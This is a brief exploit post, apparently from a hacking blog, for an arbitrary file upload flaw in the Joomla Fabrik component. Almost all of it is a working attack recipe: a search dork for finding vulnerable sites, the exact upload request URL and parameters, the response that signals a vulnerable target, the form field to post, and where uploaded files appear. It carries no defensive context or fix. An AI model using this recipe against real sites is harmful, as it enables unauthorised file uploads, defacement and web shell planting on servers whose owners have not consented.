Joomla Component Fabrik Abitrary File Upload
Joomla Component Fabrik Abitrary File Upload
author: Et04 & bL@cKID
dork : inurl:index.php?option=com_fabrik
exploit: site/[path]/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
ciri vuln : {"filepath":null,"uri":null}
postfile: file
CSRF Onlen
File uploaded : site/[path]/namafile.htm
Post a Comment